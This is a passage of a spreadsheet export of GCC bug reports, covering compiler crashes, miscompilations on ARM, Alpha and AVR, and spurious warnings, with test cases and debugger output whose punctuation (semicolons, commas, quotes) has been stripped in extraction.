	/home/dimhen/src/gcc_current/gcc/lto/lto.c:2338
0x6c5208 lto_wpa_write_files
	/home/dimhen/src/gcc_current/gcc/lto/lto.c:2475
0x6c5208 do_whole_program_analysis
	/home/dimhen/src/gcc_current/gcc/lto/lto.c:3157
0x6c5208 lto_main()
	/home/dimhen/src/gcc_current/gcc/lto/lto.c:3317
Please submit a full bug report</t>
  </si>
  <si>
    <t>GCC-21489</t>
  </si>
  <si>
    <t>Wrong code generated for legal program RM 6.4.1(13) 9.5.1(3) 9.5.3(8)</t>
  </si>
  <si>
    <t>(From the Debian BTS):
-- fails in 3.15p 3.4 and 4.0
-- RM 6.4.1(13)
-- RM 9.5.1(3)
-- RM 9.5.3(8)
with text_io use text_io
procedure Test_306834 is
   type intp is access all integer
   i: aliased integer := 3
   x1: intp
   procedure p1(x: out intp) is
   begin
      null
   end
   protected type T1 is
      entry e1 (x: out intp)
      procedure p2(x: out intp)
   end T1
    protected body T1 is
      entry e1 (x: out intp) when true is
      begin
         null
      end e1
      procedure p2(x: out intp) is
      begin
         null
      end
   end T1
   task type T2 is
      entry e1 (x: out intp)
   end T2
   task body T2 is
   begin
      for i in 1..2 loop
         accept e1 (x: out intp) do
            begin
               null
            end
         end e1
      end loop
   end T2
   pt: T1
   tt: T2
   procedure doit(x2: intp) is
      procedure check is
      begin
         if x1 = x2
           then put_line(PASSED)
           else put_line(FAILED)
         end if
         x1 := x2
      end
   begin
      x1 := x2
      p1(x1)
      check
      pt.p2(x1)
      check
      pt.e1(x1)
      check
      tt.e1(x1)
      check
   end
begin
   doit(null)
   doit(i'access)
end Test_306834
The program should print PASSED 8 times but instead prints PASSED 6 times
and then FAILED two times.
-- 
Ludovic Brenta.</t>
  </si>
  <si>
    <t>GCC-3492</t>
  </si>
  <si>
    <t>-fno-bounds-check in combination with -W gives strange message</t>
  </si>
  <si>
    <t>[ Reported to the Debian BTS as report #102353.
  Please CC 102353-quiet@bugs.debian.org on replies.
  Log of report can be found at http://bugs.debian.org/102353 ]
&gt; Hello.java &lt;&lt; EOF
  public class Hello {
      public static void main(String[] args) {
          System.out.println(Hello!)
      }
  }
  EOF
  gcj -W -fno-bounds-check --main=Hello Hello.java
  jc1: warning: Ignoring command line option '-fno-bounds-check'
  jc1: warning: (It is valid for Fortran but not the selected language)
The comments in gcc/toplev.c indicates that -fno-check-bounds can
be used instead but that doesn't work at all.
Omitting -W or replacing -W with -Wall suppresses the warning.
Release:
3.0 (Debian GNU/Linux)
Environment:
System: Debian GNU/Linux (testing/unstable)
Architecture: i686
host: i386-linux
build: i386-linux
target: i386-linux
configured with: ../src/configure -v --enable-languages=cc++javaf77protoobjc --prefix=/usr --infodir=/share/info --mandir=/share/man --enable-shared --with-gnu-as --with-gnu-ld --with-system-zlib --enable-long-long --enable-nls --without-included-gettext --disable-checking --enable-threads=posix --enable-java-gc=boehm --with-cpp-install-dir=bin --enable-objc-gc i386-linux</t>
  </si>
  <si>
    <t>102353-quiet</t>
  </si>
  <si>
    <t>GCC-24892</t>
  </si>
  <si>
    <t>ACCESS argument to the OPEN statement</t>
  </si>
  <si>
    <t>$ cat u.f
      OPEN(10ACCESS='APPEND')
      END
$ g77 u.f &amp;&amp; ./a.out
$ gfortran u.f &amp;&amp; ./a.out
At line 1 of file u.f
Fortran runtime error: Bad ACCESS parameter in OPEN statement
I don't think it is in the standard but I don't have the standard at hand).</t>
  </si>
  <si>
    <t>GCC-42653</t>
  </si>
  <si>
    <t>ICE with -g and -flto (requires both flags to crash)</t>
  </si>
  <si>
    <t>$ g++ -c -flto -g fltog.ii
fltog.ii: In member function â€˜MCIListenerâ€™:
fltog.ii:25:3: internal compiler error: tree check: expected class â€˜typeâ€™ have â€˜declarationâ€™ (function_decl) in gen_type_die_with_usage at dwarf2out.c:18747
Occurs with top-of-tree g++-4.5.
Testcase fltog.ii:
namespace llvm
{
  class Function
  class MachineCodeInfo
  class ExecutionEngine
  {
  }
  class JIT:public ExecutionEngine
  {
    void runJITOnFunction (Function * F MachineCodeInfo * MCI = 0)
  }
  class JITEventListener
  {
  public:JITEventListener ()
    {
    } virtual ~JITEventListener ()
  }
}
using namespace llvm
void
JIT::runJITOnFunction (Function * F MachineCodeInfo * MCI)
{
  class MCIListener:public JITEventListener
  {
    MachineCodeInfo *const MCI
  public:  MCIListener (MachineCodeInfo * mci):MCI (mci)
    {
  }}
}</t>
  </si>
  <si>
    <t>GCC-67226</t>
  </si>
  <si>
    <t>Incorrect code generated for tail call where parameters are structs passed by value -O2 is used and target is ARM</t>
  </si>
  <si>
    <t>Created attachment 36188
Test case to reproduce bug run show_bug.sh on ARMv7 system with GCC 5.2.1
I compiled this code with gcc (Debian 5.2.1-15) 5.2.1 20150808 on an ARMv7 target (RPi2).
typedef struct assembly_operand_t
{   int   type value symtype symflags marker
} assembly_operand
void t2(assembly_operand to assembly_operand from)
{   if (to.value == from.value) return
    if (to.value == 0) assemblez_1(32 from)
    else               assemblez_store(to from)
}
My code calls the function t2 with to.value == 0. If I compile t2 with -O0 or -O1 assemblez_1 is called as expected with the correct arguments. If I compile t2 with -O2 the from structure is copied incorrectly. The type field has the incorrect value.
I have seen this bug on GCC 4.6.x and 4.7.x as well as 5.2.1 and it seems to behave the same regardless of whether the target ISA is 32-bit ARM or Thumb. However it does not occur on x86/x86_64. For ARM targets it appears that -O2 causes the call to assemblez_1 to be generated as a tail call whereas it is an ordinary call with -O1/-O0.
In the attached test case the same code is compiled with both -O0 and -O2. Both copies are then executed. The test case shows that the from.type field is corrupted in the -O2 case. See the show_bug.sh script for the command-line options used. 
More information:
This GCC is from https://packages.debian.org/sid/gcc.
# gcc --version
gcc (Debian 5.2.1-15) 5.2.1 20150808
Copyright (C) 2015 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.</t>
  </si>
  <si>
    <t>jack.d.whitham</t>
  </si>
  <si>
    <t>GCC-44454</t>
  </si>
  <si>
    <t>[4.6 Regression] Many new failures</t>
  </si>
  <si>
    <t>On Linux/ia32 revision 160384 gave
FAIL: g++.dg/other/static11.C (internal compiler error)
FAIL: g++.dg/other/static11.C (test for excess errors)
FAIL: gcc.c-torture/unsorted/dump-noaddr.c  -O1   -dumpbase dump1/dump-noaddr.c -DMASK=1 -x c --param ggc-min-heapsize=1 -fdump-ipa-all -fdump-rtl-all -fdump-tree-all -fdump-noaddr (internal compiler error)
FAIL: gcc.c-torture/unsorted/dump-noaddr.c  -O1   -dumpbase dump2/dump-noaddr.c -DMASK=2 -x c -fdump-ipa-all -fdump-rtl-all -fdump-tree-all -fdump-noaddr (internal compiler error)
FAIL: gcc.c-torture/unsorted/dump-noaddr.c  -O2   -dumpbase dump1/dump-noaddr.c -DMASK=1 -x c --param ggc-min-heapsize=1 -fdump-ipa-all -fdump-rtl-all -fdump-tree-all -fdump-noaddr (internal compiler error)
FAIL: gcc.c-torture/unsorted/dump-noaddr.c  -O2   -dumpbase dump2/dump-noaddr.c -DMASK=2 -x c -fdump-ipa-all -fdump-rtl-all -fdump-tree-all -fdump-noaddr (internal compiler error)
FAIL: gcc.c-torture/unsorted/dump-noaddr.c  -O2 -flto   -dumpbase dump1/dump-noaddr.c -DMASK=1 -x c --param ggc-min-heapsize=1 -fdump-ipa-all -fdump-rtl-all -fdump-tree-all -fdump-noaddr (internal compiler error)
FAIL: gcc.c-torture/unsorted/dump-noaddr.c  -O2 -flto   -dumpbase dump2/dump-noaddr.c -DMASK=2 -x c -fdump-ipa-all -fdump-rtl-all -fdump-tree-all -fdump-noaddr (internal compiler error)
FAIL: gcc.c-torture/unsorted/dump-noaddr.c  -O2 -fwhopr   -dumpbase dump1/dump-noaddr.c -DMASK=1 -x c --param ggc-min-heapsize=1 -fdump-ipa-all -fdump-rtl-all -fdump-tree-all -fdump-noaddr (internal compiler error)
FAIL: gcc.c-torture/unsorted/dump-noaddr.c  -O2 -fwhopr   -dumpbase dump2/dump-noaddr.c -DMASK=2 -x c -fdump-ipa-all -fdump-rtl-all -fdump-tree-all -fdump-noaddr (internal compiler error)
FAIL: gcc.c-torture/unsorted/dump-noaddr.c  -O3 -fomit-frame-pointer   -dumpbase dump1/dump-noaddr.c -DMASK=1 -x c --param ggc-min-heapsize=1 -fdump-ipa-all -fdump-rtl-all -fdump-tree-all -fdump-noaddr (internal compiler error)
FAIL: gcc.c-torture/unsorted/dump-noaddr.c  -O3 -fomit-frame-pointer   -dumpbase dump2/dump-noaddr.c -DMASK=2 -x c -fdump-ipa-all -fdump-rtl-all -fdump-tree-all -fdump-noaddr (internal compiler error)
FAIL: gcc.c-torture/unsorted/dump-noaddr.c  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions   -dumpbase dump1/dump-noaddr.c -DMASK=1 -x c --param ggc-min-heapsize=1 -fdump-ipa-all -fdump-rtl-all -fdump-tree-all -fdump-noaddr (internal compiler error)
FAIL: gcc.c-torture/unsorted/dump-noaddr.c  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions   -dumpbase dump2/dump-noaddr.c -DMASK=2 -x c -fdump-ipa-all -fdump-rtl-all -fdump-tree-all -fdump-noaddr (internal compiler error)
FAIL: gcc.c-torture/unsorted/dump-noaddr.c  -O3 -fomit-frame-pointer -funroll-loops   -dumpbase dump1/dump-noaddr.c -DMASK=1 -x c --param ggc-min-heapsize=1 -fdump-ipa-all -fdump-rtl-all -fdump-tree-all -fdump-noaddr (internal compiler error)
FAIL: gcc.c-torture/unsorted/dump-noaddr.c  -O3 -fomit-frame-pointer -funroll-loops   -dumpbase dump2/dump-noaddr.c -DMASK=2 -x c -fdump-ipa-all -fdump-rtl-all -fdump-tree-all -fdump-noaddr (internal compiler error)
FAIL: gcc.c-torture/unsorted/dump-noaddr.c  -O3 -g   -dumpbase dump1/dump-noaddr.c -DMASK=1 -x c --param ggc-min-heapsize=1 -fdump-ipa-all -fdump-rtl-all -fdump-tree-all -fdump-noaddr (internal compiler error)
FAIL: gcc.c-torture/unsorted/dump-noaddr.c  -O3 -g   -dumpbase dump2/dump-noaddr.c -DMASK=2 -x c -fdump-ipa-all -fdump-rtl-all -fdump-tree-all -fdump-noaddr (internal compiler error)
FAIL: gcc.c-torture/unsorted/dump-noaddr.c  -Os   -dumpbase dump1/dump-noaddr.c -DMASK=1 -x c --param ggc-min-heapsize=1 -fdump-ipa-all -fdump-rtl-all -fdump-tree-all -fdump-noaddr (internal compiler error)
FAIL: gcc.c-torture/unsorted/dump-noaddr.c  -Os   -dumpbase dump2/dump-noaddr.c -DMASK=2 -x c -fdump-ipa-all -fdump-rtl-all -fdump-tree-all -fdump-noaddr (internal compiler error)
FAIL: gcc.dg/20050811-1.c (internal compiler error)
FAIL: gcc.dg/20050811-1.c (test for excess errors)
FAIL: gcc.dg/pr30957-1.c (internal compiler error)
FAIL: gcc.dg/pr30957-1.c (test for excess errors)
FAIL: gcc.dg/pr30957-1.c scan-rtl-dump loop2_unroll Expanding Accumulator
FAIL: gcc.dg/pr35729.c (internal compiler error)
FAIL: gcc.dg/pr35729.c (test for excess errors)
FAIL: gcc.dg/sms-3.c (internal compiler error)
FAIL: gcc.dg/sms-3.c (test for excess errors)
FAIL: gcc.dg/sms-4.c (internal compiler error)
FAIL: gcc.dg/sms-4.c (test for excess errors)
FAIL: gcc.dg/sms-6.c (internal compiler error)
FAIL: gcc.dg/sms-6.c (test for excess errors)
FAIL: gcc.dg/sms-7.c (internal compiler error)
FAIL: gcc.dg/sms-7.c (test for excess errors)
FAIL: gcc.dg/var-expand1.c (internal compiler error)
FAIL: gcc.dg/var-expand1.c (test for excess errors)
FAIL: gcc.dg/var-expand1.c scan-rtl-dump loop2_unroll Expanding Accumulator
Revision 160380 is OK.</t>
  </si>
  <si>
    <t>GCC-14382</t>
  </si>
  <si>
    <t>[libobjc] Calling +initialize on a per category basis</t>
  </si>
  <si>
    <t>The file libobjc/README contains the passage:
-----------------------------
+initialize
===========
...each +initialize method is called exactly once (or
never if no methods of that particular class is never called).
Besides this it is allowed to have several +initialize methods one
for each category.  The order in which these (multiple methods) are
called is not well defined.  I am not completely certain what the
semantics of this method is for other implementations but this is
how it works for GNU Objective C.
------------------------------
Yet currently the invocation of +initialize in libobjc is implemented to send
+initialize only once and does the method lookup manually.
This behavior is compatible to the behavior of the Apple/NeXT runtime.
There is a bug either in the documentation or on the implementation.
Personally I think the documented behavior is very useful but it would imply
not being able to override +initialize in categories.  Usually that wouldn't
make much sense as these implementations typically have two objectives:
a) insure related classes are initialized
b) initialize static globals which couldn't be initialized in a separate
   category anyway.
But like I said that's just usually typical.
I would be in favor of fixing the GNU runtime implementation to correspond to
the documentation *if* the Apple runtime would also implement this feature.
Otherwise I'd rather fix the documentation to avoid code relying on
incompatible features but I don't have a strong opinion if others think the GNU
runtime should deviate in this respect.</t>
  </si>
  <si>
    <t>GCC-15945</t>
  </si>
  <si>
    <t>[3.4/4.0 Regression] Incorrect floating point optimization</t>
  </si>
  <si>
    <t>The following testcase is miscompiled with gcc-3_4-branch at -O3 on
s390x-redhat-linux (worked properly in GCC 3.3.x and earlier).
/* { dg-do run { target *-*-linux* } } */
/* { dg-options -O3 -lm } */
#include 
#include 
typedef union
{
  int i[2]
  double x
} U
double __attribute__ ((noinline))
foo (double x)
{
  U u v
  u.x = x
  u.i[0] = 0x7ff00000
  v.i[0] = 0x7ff00000
  u.i[1] = 0
  v.i[1] = 0
  return u.x / v.x
}
double d
int
main (void)
{
  feclearexcept (FE_ALL_EXCEPT)
  d = foo (2.0)
  if (fetestexcept (FE_INVALID) == 0)
    abort ()
  return 0
}
Unless -ffast-math the division should not be optimized out as it is supposed
to generate invalid exception.
This causes miscompilation of glibc.</t>
  </si>
  <si>
    <t>GCC-36053</t>
  </si>
  <si>
    <t>[4.4 Regression]: ERROR: tcl error sourcing gcc/gcc/testsuite/gcc.dg/dg.exp</t>
  </si>
  <si>
    <t>Gcc 4.4 revision 134659 gives
ERROR: tcl error sourcing /home/regress/tbox/svn-gcc/gcc/testsuite/gcc.dg/dg.exp.
ERROR: unmatched open brace in list
Revision 134655 is OK.</t>
  </si>
  <si>
    <t>GCC-55547</t>
  </si>
  <si>
    <t>[4.8 Regression] Alias analysis does not handle AND addresses correctly</t>
  </si>
  <si>
    <t>The patch that fixed alias analysis [1] triggered following testsuite failure [2] on alphaev68-linux-gnu:
FAIL: gfortran.fortran-torture/execute/save_1.f90 execution  -O2 
FAIL: gfortran.fortran-torture/execute/save_1.f90 execution  -O2 -fomit-frame-pointer -finline-functions 
FAIL: gfortran.fortran-torture/execute/save_1.f90 execution  -O2 -fomit-frame-pointer -finline-functions -funroll-loops 
FAIL: gfortran.fortran-torture/execute/save_1.f90 execution  -O2 -fbounds-check 
The testcase fails in the line where i is checked for 26. The value is 0:
      subroutine foo (b)
        logical b
        integer i j
        character*24 s
        save
        if (b) then
          i = 26
          j = 131
          s = 'This is a test string'
        else
          if (i .ne. 26 .or. j .ne. 131) call abort
          if (s .ne. 'This is a test string') call abort
        end if
      end subroutine foo
This is a runtime failure but the problem can be seen with a crosscompiler configured with --target=alpha-linux-gnu.
The testcase should be compiled with -O2 -mcpu=ev67 -mexplicit-relocs.
Before _208r.sched1 we have:
   10: r77:DI=high(`i.843')
   11: r78:SI=0x1a
   12: [r77:DI+low(`i.843')]=r78:SI
      REG_DEADr78:SI
      REG_DEADr77:DI
...
   42: r102:DI=r81:DI+low(`s.845')
      REG_EQUAL`s.845'
   43: r106:DI=[r102:DI+0xf&amp;0xfffffffffffffff8]
   44: r105:DI=[r81:DI+low(`s.845')&amp;0xfffffffffffffff8]
      REG_EQUAL[`s.845'&amp;0xfffffffffffffff8]
 ...
   57: [r81:DI+low(`s.845')&amp;0xfffffffffffffff8]=r105:DI
      REG_DEADr105:DI
      REG_DEADr81:DI
(The last sequence is part of alpha_expand_block_move specifically an unaligned access to the head of string s.845). In the above sequence load and store to i.843 and s.845 are lined one after another.
The problematic sequence is shown in function foo in _.208r.sched1 RTL dump after scheduler reordered instructions:
   17: r82:DI=high(`*$LC0')
   16: r81:DI=high(`s.845')
   70: r115:QI=0x20
   10: r77:DI=high(`i.843')
   18: r86:DI=r82:DI+low(`*$LC0')
      REG_EQUAL`*$LC0'
   42: r102:DI=r81:DI+low(`s.845')
      REG_EQUAL`s.845'
   19: r83:DI=[r82:DI+low(`*$LC0')&amp;0xfffffffffffffff8]
      REG_DEADr82:DI
      REG_EQUAL[`*$LC0'&amp;0xfffffffffffffff8]
   44: r105:DI=[r81:DI+low(`s.845')&amp;0xfffffffffffffff8]
      REG_EQUAL[`s.845'&amp;0xfffffffffffffff8]
   21: r89:DI=[r86:DI+0xf&amp;0xfffffffffffffff8]
   20: r84:DI=[r86:DI+0x8&amp;0xfffffffffffffff8]
   23: r91:DI=r86:DI&amp;0x7
   11: r78:SI=0x1a
   43: r106:DI=[r102:DI+0xf&amp;0xfffffffffffffff8]
...
   12: [r77:DI+low(`i.843')]=r78:SI
      REG_DEADr78:SI
      REG_DEADr77:DI
...
   57: [r81:DI+low(`s.845')&amp;0xfffffffffffffff8]=r105:DI
      REG_DEADr105:DI
      REG_DEADr81:DI
As it happens i lives inside aligned s address range:
(gdb) p &amp;i
$3 = (PTR TO -&gt; ( integer(kind=4) )) 0x120012090 
(gdb) p &amp;s
$4 = (PTR TO -&gt; ( character*24 )) 0x120012094 
Due to the way unaligned stores are implemented on alpha where an aligned address is read first the value is inserted and the combination is stored back to aligned address we rewrite location of i with previous value 0 in this case.
To illustrate this problem let's put breakpoints at the store of i (b1) and store of s (b2):
   0x0000000120000a8c :   cmoveq  t100t9
   0x0000000120000a90 :   ldah    t100(gp)
b1 0x0000000120000a94 :   stl     a3-32640(t10)
   0x0000000120000a98 :   lda     a3131
   0x0000000120000a9c :   or      t2t8t2
   0x0000000120000aa0 :   or      t3t9t3
   0x0000000120000aa4 :   ldah    t100(gp)
   0x0000000120000aa8 :   stb     t623(t0)
   0x0000000120000aac :   insqh   t2t0t8
   0x0000000120000ab0 :   mskqh   t5t0t5
   0x0000000120000ab4 :   stl     a3-32644(t10)
   0x0000000120000ab8 :   insqh   t3t0t1
   0x0000000120000abc :   insql   t2t0t2
   0x0000000120000ac0 :   or      t5t8t5
   0x0000000120000ac4 :   stq_u   t515(t0)
   0x0000000120000ac8 :   insql   t3t0t3
   0x0000000120000acc :   or      t1t2t1
   0x0000000120000ad0 :   stq_u   t18(t0)
   0x0000000120000ad4 :   stb     a416(t0)
   0x0000000120000ad8 :   or      t4t3t4
b2 0x0000000120000adc :   stq_u   t4-32636(t7)
   0x0000000120000ae0 :   stb     a517(t0)
Breakpoint 1 0x0000000120000a94 in foo (b=.TRUE.) at save_1.f90:7
7                 i = 26
(gdb) p i
$5 = 0
(gdb) s
8                 j = 131
(gdb) p i
$6 = 26
(gdb) c
Continuing.
Breakpoint 2 0x0000000120000adc in foo (b=.TRUE.) at save_1.f90:9
9                 s = 'This is a test string'
(gdb) p i
$7 = 26
(gdb) s
14            end subroutine foo
(gdb) p i
$8 = 0
(gdb) 
When compiled with additional -fno-schedule-insns the test runs OK.
[1] http://gcc.gnu.org/ml/gcc-patches/2012-11/msg02225.html
[2] http://gcc.gnu.org/ml/gcc-testresults/2012-11/msg02492.html</t>
  </si>
  <si>
    <t>GCC-41440</t>
  </si>
  <si>
    <t>SEG FAULT in CSE.C caused by bad RTL expansion</t>
  </si>
  <si>
    <t>Segmentation fault occurs on test gcc.c-torture/execute/memcpy-1.c and many other tests. 
I have created a reduced case that shows problem. This dumps and backtrace are attached.
The cause seem to be that cse assumes previous instruction is CC0 setter. The expanded RTL show this is surprising not true. So CSE crashes with null rtx.
The problem occurs on memcpy() expansion.
The expansion of memcpy() uses RTL expander movemem which is a simple RTL do loop. This indeed correctly has compare directly before test and jump (see pattern attached). Yet when the RTL is expanded part of the next block's i=0 is inserted after compare and before jump. The tree dump looks right.
The next block RTL loop is not right either it is supposed to be checking dst[i] != i  - but in reality is  dst[i] != 0.
Using built-in specs.
Target: avr
Configured with: ../../gccsvn/configure --prefix=/home/andy/local/avr --target=avr --enable-languages=cc++ --disable-nls --disable-libssp --with-dwarf2 --enable-checking
Thread model: single
gcc version 4.5.0 20090922 (experimental) (GCC) 
#include 
#define MEMCPY_SIZE (100)
main ()
{
  unsigned i
  unsigned char src[MEMCPY_SIZE]
  unsigned char dst[MEMCPY_SIZE]
  for (i = 0 i &lt; MEMCPY_SIZE i++)
  {
    src[i] = (unsigned char) i
    dst[i] = 0
  }
  (void) memcpy (dst src MEMCPY_SIZE)
  for (i = 0 i &lt; MEMCPY_SIZE i++)
    if (dst[i] != (unsigned char) i)
      abort ()
  exit (0)
}
===================================================================
(gdb) run  -mmcu=atmega128 -Os -O2  -DSTACK_SIZE=1535 -fdump-rtl-all -fdump-tree-all  memcpy-1.c 
Starting program: /home/andy/local/avr/bin/avr-cc1 -mmcu=atmega128 -Os -O2  -DSTACK_SIZE=1535 -fdump-rtl-all -fdump-tree-all  memcpy-1.c
 main
memcpy-1.c: In function 'main':
memcpy-1.c:21:7: warning: incompatible implicit declaration of built-in function 'abort'
memcpy-1.c:23:3: warning: incompatible implicit declaration of built-in function 'exit'
Analyzing compilation unit
Performing interprocedural optimizations
        Assembling functions:
 main
Program received signal SIGSEGV Segmentation fault.
equiv_constant (x=0x0) at ../../../gccsvn/gcc/cse.c:3809
3809	  if (REG_P (x)
(gdb) where
#0  equiv_constant (x=0x0) at ../../../gccsvn/gcc/cse.c:3809
#1  0x085f16e3 in fold_rtx (x=0xb7de5c18 insn=0xb7d8ea28) at ../../../gccsvn/gcc/cse.c:3277
#2  0x085f16da in fold_rtx (x=0xb7de66a0 insn=0xb7d8ea28) at ../../../gccsvn/gcc/cse.c:3276
#3  0x085f5af6 in cse_insn (insn=0xb7d8ea28) at ../../../gccsvn/gcc/cse.c:4496
#4  0x085f8a45 in cse_main (f=0xb7de9ba0 nregs=167) at ../../../gccsvn/gcc/cse.c:6269
#5  0x085f93da in rest_of_handle_cse () at ../../../gccsvn/gcc/cse.c:7158
#6  0x0833f3b2 in execute_one_pass (pass=0x87a1fa0) at ../../../gccsvn/gcc/passes.c:1295
#7  0x0833f62c in execute_pass_list (pass=0x87a1fa0) at ../../../gccsvn/gcc/passes.c:1344
#8  0x0833f63f in execute_pass_list (pass=0x879f200) at ../../../gccsvn/gcc/passes.c:1345
#9  0x08410110 in tree_rest_of_compilation (fndecl=0xb7dbda80) at ../../../gccsvn/gcc/tree-optimize.c:389
#10 0x0857399a in cgraph_expand_function (node=0xb7d34900) at ../../../gccsvn/gcc/cgraphunit.c:1158
#11 0x085763e5 in cgraph_finalize_compilation_unit () at ../../../gccsvn/gcc/cgraphunit.c:1217
#12 0x080b694b in c_write_global_declarations () at ../../../gccsvn/gcc/c-decl.c:9361
#13 0x083b518a in toplev_main (argc=8 argv=0xbfabb114) at ../../../gccsvn/gcc/toplev.c:1050
#14 0x0813abf2 in main (argc=Cannot access memory at address 0x10
) at ../../../gccsvn/gcc/main.c:35
(gdb) up
#1  0x085f16e3 in fold_rtx (x=0xb7de5c18 insn=0xb7d8ea28) at ../../../gccsvn/gcc/cse.c:3277
3277		    const_arg = equiv_constant (folded_arg)
(gdb) print folded_arg
$4 = (rtx) 0x0
(gdb) pr insn
(nil)
(gdb) print insn
$5 = (rtx) 0xb7d8ea28
(gdb) pr insn
(jump_insn 138 111 151 5 memcpy-1.c:17 (set (pc)
        (if_then_else (ne (cc0)
                (const_int 0 [0x0]))
            (label_ref 131)
            (pc))) 110 {branch} (expr_list:REG_BR_PROB (const_int 9900 [0x26ac])
        (nil))
 -&gt; 131)
(gdb) print folded_arg
$6 = (rtx) 0x0
(gdb) list
3272		    break
3273	#endif
3274	
3275		  default:
3276		    folded_arg = fold_rtx (folded_arg insn)
3277		    const_arg = equiv_constant (folded_arg)
3278		    break
3279		  }
3280	
3281		/* For the first three operands see if the operand
(gdb) 
=======================================================================
TREE DUMP - OPTIMIZED:
 Function main (main)
main ()
{
  unsigned int src.33
  unsigned int D.2132
  unsigned char D.2128
  unsigned char D.2130
  unsigned int ivtmp.29
  unsigned int ivtmp.24
  unsigned char dst[100]
  unsigned char src[100]
  unsigned int i
  unsigned char D.2091
  unsigned char D.2090
:
  ivtmp.24_23 = (unsigned int) 
  ivtmp.29_26 = (unsigned int) 
  src.33_31 = (unsigned int) 
  D.2132_32 = src.33_31 + 100
:
  # ivtmp.24_1 = PHI 
  # ivtmp.29_24 = PHI 
  D.2128_27 = (unsigned char) ivtmp.24_1
  D.2130_29 = (unsigned char) ivtmp.24_23
  D.2090_30 = D.2128_27 - D.2130_29
  MEM[index: ivtmp.24_1] = D.2090_30
  ivtmp.24_16 = ivtmp.24_1 + 1
  MEM[index: ivtmp.29_24] = 0
  ivtmp.29_25 = ivtmp.29_24 + 1
  if (ivtmp.24_16 != D.2132_32)
    goto 
  else
    goto 
:
  dst = src
:
  # i_19 = PHI 
  # ivtmp.29_17 = PHI 
  D.2091_7 = MEM[index: ivtmp.29_17]
  ivtmp.29_10 = ivtmp.29_17 + 1
  D.2090_22 = (unsigned char) i_19
  if (D.2091_7 != D.2090_22)
    goto 
  else
    goto 
:
  abort ()
:
  i_9 = i_19 + 1
  if (i_9 != 100)
    goto 
  else
    goto 
:
  exit (0)
}
=====================================================================
RTL EXPANDER FROM AVR.MD
(define_expand movmemhi
  [(parallel [(set (match_operand:BLK 0 memory_operand )
          (match_operand:BLK 1 memory_operand ))
          (use (match_operand:HI 2 const_int_operand ))
          (use (match_operand:HI 3 const_int_operand ))])]
  {
  int prob
  HOST_WIDE_INT count
  enum machine_mode mode
  rtx label = gen_label_rtx ()
  rtx loop_reg
  rtx jump
  /* Copy pointers into new psuedos - they will be changed.  */
  rtx addr0 = copy_to_mode_reg (Pmode XEXP (operands[0] 0))
  rtx addr1 = copy_to_mode_reg (Pmode XEXP (operands[1] 0))
  /* Create rtx for tmp register - we use this as scratch.  */
  rtx tmp_reg_rtx  = gen_rtx_REG (QImode TMP_REGNO)
  if (GET_CODE (operands[2]) != CONST_INT)
    FAIL
  count = INTVAL (operands[2])
  if (count &lt;= 0)
    FAIL
  /* Work out branch probability for latter use.  */
  prob = REG_BR_PROB_BASE - REG_BR_PROB_BASE / count
  /* See if constant fit 8 bits.  */
  mode = (count &lt; 0x100) ? QImode : HImode
  /* Create loop counter register.  */
  loop_reg = copy_to_mode_reg (mode gen_int_mode (count mode))
  /* Now create RTL code for move loop.  */
  /* Label at top of loop.  */
  emit_label (label)
  /* Move one byte into scratch and inc pointer.  */
  emit_move_insn (tmp_reg_rtx gen_rtx_MEM (QImode addr1))
  emit_move_insn (addr1 gen_rtx_PLUS (Pmode addr1 const1_rtx))
  /* Move to mem and inc pointer.  */
  emit_move_insn (gen_rtx_MEM (QImode addr0) tmp_reg_rtx)
  emit_move_insn (addr0 gen_rtx_PLUS (Pmode addr0 const1_rtx))
  /* Decrement count.  */
  emit_move_insn (loop_reg gen_rtx_PLUS (mode loop_reg constm1_rtx))
  /* Compare with zero and jump if not equal. */
  emit_cmp_and_jump_insns (loop_reg const0_rtx NE NULL_RTX mode 1
                           label)
  /* Set jump probability based on loop count.  */
  jump = get_last_insn ()
  add_reg_note (jump REG_BR_PROB GEN_INT (prob))
  DONE
})</t>
  </si>
  <si>
    <t>GCC-36655</t>
  </si>
  <si>
    <t>unjustified warning for extern template when using -pedantic -std=c++0x</t>
  </si>
  <si>
    <t>Consider:
  template  void f() {}
  extern template void f()
When compiled with:
   g++ -pedantic -std=c++0x -c t.cpp
the following warning is emitted:
   warning: ISO C++ forbids the use of â€˜externâ€™ on explicit instantiations
Since extern template has already been integrated into the C++0x working paper I think this warning should not be emitted when using -std=c++0x not even with -pedantic.</t>
  </si>
  <si>
    <t>GCC-43820</t>
  </si>
  <si>
    <t>[4.4/4.5/4.6 Regression] auto_ptr used with incomplete type no longer triggers warning</t>
  </si>
  <si>
    <t>The following code used to trigger a warning with gcc 4.2 and 4.3 but passes silently with 4.4 and 4.5:
=====================================
#include 
struct S
int main()
{
   std::auto_ptr p( (S*) 1234 )
}
=====================================
This code triggers a segfault but when the pointer is actually from a real object then its destructor simply is not called and resources are leaked.</t>
  </si>
  <si>
    <t>rlerallut</t>
  </si>
  <si>
    <t>GCC-58290</t>
  </si>
  <si>
    <t>[4.9 Regression] error: virtual definition of statement not up-to-date</t>
  </si>
  <si>
    <t>Trunk yields:
bug.f90: In function â€˜dbcsr_buffers_flushâ€™:
bug.f90:28:0: error: virtual definition of statement not up-to-date
   SUBROUTINE dbcsr_buffers_flush (buffers)
 ^
# .MEM_4 = VDEF 
_5 = dbcsr_buffers_get_num (buffers_3(D))
bug.f90:28:0: internal compiler error: verify_ssa failed
0xb62c24 verify_ssa(bool)
	../../gcc/gcc/tree-ssa.c:1046
0x9217de execute_function_todo
	../../gcc/gcc/passes.c:1834
when compiling
&gt; gfortran -c -fipa-pta -O1 -c  bug.f90
&gt; cat bug.f90
MODULE dbcsr_types
  INTEGER PARAMETER :: dbcsr_error_stack_size = 30
  TYPE dbcsr_error_stack_type
     CHARACTER(80) DIMENSION(dbcsr_error_stack_size) :: s = ''
  END TYPE dbcsr_error_stack_type
  TYPE dbcsr_error_type
   TYPE(dbcsr_error_stack_type) :: stack
  END TYPE dbcsr_error_type
  TYPE dbcsr_data_obj
  END TYPE dbcsr_data_obj
  TYPE dbcsr_block_buffer_type
     TYPE(dbcsr_data_obj) DIMENSION(:) POINTER :: buffers
  END TYPE dbcsr_block_buffer_type
  TYPE dbcsr_block_buffer_obj
     TYPE(dbcsr_block_buffer_type) POINTER :: b
  END TYPE dbcsr_block_buffer_obj
CONTAINS
